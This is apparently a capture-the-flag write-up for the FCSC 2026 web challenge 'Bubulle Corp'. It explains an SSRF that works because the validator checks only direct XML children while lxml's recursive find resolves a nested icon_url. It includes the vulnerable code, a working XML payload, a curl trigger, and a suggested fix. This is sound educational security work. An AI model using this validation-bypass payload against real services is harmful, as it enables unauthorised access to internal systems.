web web-server ssrf xml lxml xpath-find-disagreement parser-differential validation-bypass pycurl reverse-proxy apache internal-service

The settings endpoint validates only the direct-child <icon_url> (must start with https://), but fetch_icon resolves it with lxml's recursive .find('.//icon_url'). Nest an http:// icon_url one level deeper to SSRF the internal Apache proxy, whose AliasMatch serves flag.txt for any non-root path.

Bubulle Corp — XML find() disagreement → SSRF to an internal proxy flag alias

CTF: FCSC 2026 · Category: Web (server-side) · Author: Mizu

Challenge overview

Three services: a public Flask frontend, an internal backend (Flask, only reachable through the proxy), and an Apache internal-proxy. The proxy config is the whole point:

HttpProtocolOptions Unsafe
AliasMatch "^/.+" "/flag.txt"          # any non-root path -> serves the flag file
<Location "/">
    ProxyPass http://bubulle-corp-internal-backend:5000/ keepalive=Off disablereuse=On
</Location>
<LocationMatch "^/.+">
    ProxyPass "!"
    Require all granted
</LocationMatch>

So / proxies to the backend, but any other path (/x, /anything) is answered with the local flag.txt instead. All we need is something that issues an HTTP request to http://bubulle-corp-internal-proxy/<anything> and hands us the response. The frontend's "profile icon" feature does exactly that.
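
To make the routing rule concrete, here is a rough Python model of it. It only reuses the "^/.+" pattern from the AliasMatch line; the function name served_from is made up for illustration, and real Apache does more (URL normalization, query-string handling) than this sketch accounts for.

```python
import re

# Same pattern as the AliasMatch directive in the proxy config.
FLAG_ALIAS = re.compile(r"^/.+")


def served_from(path: str) -> str:
    """Hypothetical model: which handler answers a given request path."""
    if FLAG_ALIAS.search(path):
        return "flag.txt"   # AliasMatch wins, ProxyPass "!" disables proxying
    return "backend"        # only the bare "/" falls through to ProxyPass


for p in ("/", "/x", "/anything/at/all"):
    print(p, "->", served_from(p))
```

Under this model only the bare root path reaches the backend, which is why the exact path used in the SSRF does not matter as long as it is not "/".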

The icon SSRF and its validation

Settings are stored as XML: <settings><icon_url>...</icon_url><method>GET</method></settings>. On save, the frontend validates the direct children:

# routes.py /settings
child_tags = [elem.tag for elem in root]
# ... requires icon_url + method present ...
for elem in list(root):                                  # DIRECT children only
    if elem.tag == "icon_url" and (not elem.text or not elem.text.startswith("https://")):
        return ... "Icon URL must start with https://"
    if elem.tag == "method" and elem.text not in ("GET", "POST"): return ...
    if elem.tag not in ("icon_url", "method", "body"): root.remove(elem)   # body is allowed!

But when the icon is actually fetched, the URL is resolved with lxml's recursive descendant search:

# icon.py
icon_url = root.find(".//icon_url").text          # ".//" = first icon_url ANYWHERE in the tree
method   = root.find(".//method").text
c.setopt(pycurl.URL, icon_url.encode("latin1"))
c.perform()

Validation walks direct children; execution does a recursive descendant find. That mismatch is the bug.
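
The disagreement is easy to reproduce in isolation. The sketch below uses the standard library's xml.etree.ElementTree as a stand-in for lxml (an assumption made so it runs without extra packages; both accept the same ".//tag" path in find()). The <wrapper> element and the text values are placeholders, not part of the challenge.

```python
import xml.etree.ElementTree as ET  # stdlib stand-in for lxml.etree

doc = ET.fromstring(
    "<settings>"
    "<wrapper><icon_url>nested</icon_url></wrapper>"
    "<icon_url>top-level</icon_url>"
    "</settings>"
)

# What the validator sees: iterating an element yields direct children only.
direct_tags = [child.tag for child in doc]

# What the fetcher sees: ".//" searches descendants at any depth.
resolved = doc.find(".//icon_url").text

# For comparison, a plain "icon_url" path only considers direct children.
direct = doc.find("icon_url").text

print(direct_tags)  # the nested icon_url never shows up here
print(resolved)
print(direct)
```

The validator never visits the node that the fetcher ends up using, so any check applied during validation says nothing about the URL that gets requested.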

Exploit: nest the real URL deeper

body is an allowed child, so put the malicious http:// URL inside <body>, and keep a benign top-level <icon_url>https://example.com</icon_url> to satisfy validation. In document order the nested one comes first, so .find('.//icon_url') returns it:

<settings>
  <method>GET</method>
  <body><icon_url>http://bubulle-corp-internal-proxy/x</icon_url></body>
  <icon_url>https://example.com</icon_url>
</settings>
  • Validation: direct children are method, body, icon_url — the direct icon_url starts with https:// ✓, method is GET ✓, body is allow-listed ✓.
  • Execution: .find('.//icon_url') returns the nested http://bubulle-corp-internal-proxy/x.
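
Both bullet points can be checked offline before touching the target. This is a sketch under assumptions: passes_validation is a hypothetical re-creation of the /settings checks quoted earlier (it skips the removal of unknown tags), and xml.etree.ElementTree again stands in for lxml. It also shows that ordering matters: with the benign node first, the recursive find would return the https:// URL.

```python
import xml.etree.ElementTree as ET  # stdlib stand-in for lxml.etree


def passes_validation(root) -> bool:
    """Hypothetical replay of the /settings checks (direct children only)."""
    tags = [e.tag for e in root]
    if "icon_url" not in tags or "method" not in tags:
        return False
    for e in list(root):
        if e.tag == "icon_url" and not (e.text or "").startswith("https://"):
            return False
        if e.tag == "method" and e.text not in ("GET", "POST"):
            return False
    return True


NESTED = "<body><icon_url>http://bubulle-corp-internal-proxy/x</icon_url></body>"
BENIGN = "<icon_url>https://example.com</icon_url>"


def resolved_url(children: str) -> str:
    """Build a settings document, confirm it validates, resolve like icon.py."""
    root = ET.fromstring(f"<settings><method>GET</method>{children}</settings>")
    assert passes_validation(root)
    return root.find(".//icon_url").text


payload_url = resolved_url(NESTED + BENIGN)   # nested node first, as in the exploit
swapped_url = resolved_url(BENIGN + NESTED)   # benign node first

print(payload_url)
print(swapped_url)
```

Both documents pass the replayed validation, but only the first ordering resolves to the internal proxy URL.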

Save it, then hit /icon to trigger the fetch; the proxy's AliasMatch serves flag.txt for /x, and the frontend returns the fetched bytes:

curl 'http://bubulle-corp/icon' -H 'Cookie: session=...'   # -> flag

Takeaways (generalized technique)

  • Validate-vs-use parser disagreement in XML: code that validates by iterating direct children (for e in root) but later resolves with a recursive selector (.//tag, XPath descendant::) lets you smuggle a malicious node one level deeper (inside an allow-listed wrapper like <body>).
  • lxml find('.//x') returns the first matching descendant in document order — control ordering to pick which node "wins".
  • SSRF value is whatever the internal topology gives you: here an Apache AliasMatch "^/.+" serves the flag for any non-root path, so a single GET to the internal proxy is enough.
  • The sequel Bubulle Corp 2 keeps this SSRF+CRLF primitive but moves the real flag behind the backend, forcing HTTP request smuggling.
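
Read the other way around, the first takeaway suggests how the check could be made consistent: validate the exact node that will later be used, and refuse documents where the selector could match more than one node. The following is only a sketch of that idea, not the challenge author's fix; safe_icon_url and accepts are hypothetical names, and ElementTree stands in for lxml.

```python
import xml.etree.ElementTree as ET  # stdlib stand-in for lxml.etree


def safe_icon_url(xml_text: str) -> str:
    """Return the icon URL only if it is unambiguous and starts with https://."""
    root = ET.fromstring(xml_text)
    anywhere = list(root.iter("icon_url"))   # every icon_url at any depth
    direct = root.findall("icon_url")        # direct children only
    if len(anywhere) != 1 or len(direct) != 1:
        raise ValueError("expected exactly one top-level icon_url")
    url = direct[0].text or ""
    if not url.startswith("https://"):
        raise ValueError("Icon URL must start with https://")
    return url  # the same node that was validated is the one returned


def accepts(xml_text: str) -> bool:
    """Convenience wrapper: True if safe_icon_url does not reject the input."""
    try:
        safe_icon_url(xml_text)
        return True
    except ValueError:
        return False


GOOD = "<settings><icon_url>https://example.com</icon_url><method>GET</method></settings>"
PAYLOAD = (
    "<settings><method>GET</method>"
    "<body><icon_url>http://bubulle-corp-internal-proxy/x</icon_url></body>"
    "<icon_url>https://example.com</icon_url></settings>"
)

print(accepts(GOOD), accepts(PAYLOAD))
```

The exploit document is rejected here because the recursive and direct-child views of icon_url no longer agree on a single node.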
